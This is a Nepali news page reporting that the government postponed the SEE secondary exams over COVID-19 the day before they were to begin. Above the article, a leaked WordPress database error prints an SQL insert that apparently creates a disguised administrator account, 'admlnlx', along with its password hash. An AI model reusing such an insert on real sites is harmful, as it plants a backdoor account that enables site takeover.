WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BQN0P7XsI/3PGjsYW3eR5A1Dz45OXZ/', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-29 07:11:36', '', 'admlnlx', 'admlnlx')
गाउँले न्युज, काठमाडौं । विस्वभरी फैलिरहेको कोरोना भाइरस (कोभिड १९) को संक्रमणको जोखिम बढीरहेकोले सरकारले माध्यमिक शिक्षा (एसईई) परीक्षा स्थगित गरेको छ ।
भोली चैत ६ गतेबाट सुरू हुने तय भएको परीक्षामा कूल चार लाख ८२ हजार ७०७ विद्यार्थी सहभागी जनाउदै थिए । परिक्षार्थिहरु मध्ये कतिपय तोकिएको परीक्षा केन्द्र पुगिसकेका थिए ।
कूल ८६ वटा विषयका करिब ५१ लाख सेट प्रश्नपत्र छपाइ गरी जिल्ला-जिल्ला पुगिसकेका थियो । सबै तयारी पुरा भइसकेको भएपनि परीक्षा सुरु हुने अघिल्लो दिन साँझ सरकारले परिक्षा स्थगितको निर्णय गरेको छ । कोभिड १९ रोकथाम तथा नियन्त्रण उच्च स्तरीय समितिका संयोजक उपप्रधानमन्त्री ईश्वर पोखरेलले एसईई परीक्षा स्थगित गर्ने निर्णय भएको जानकारी दिए ।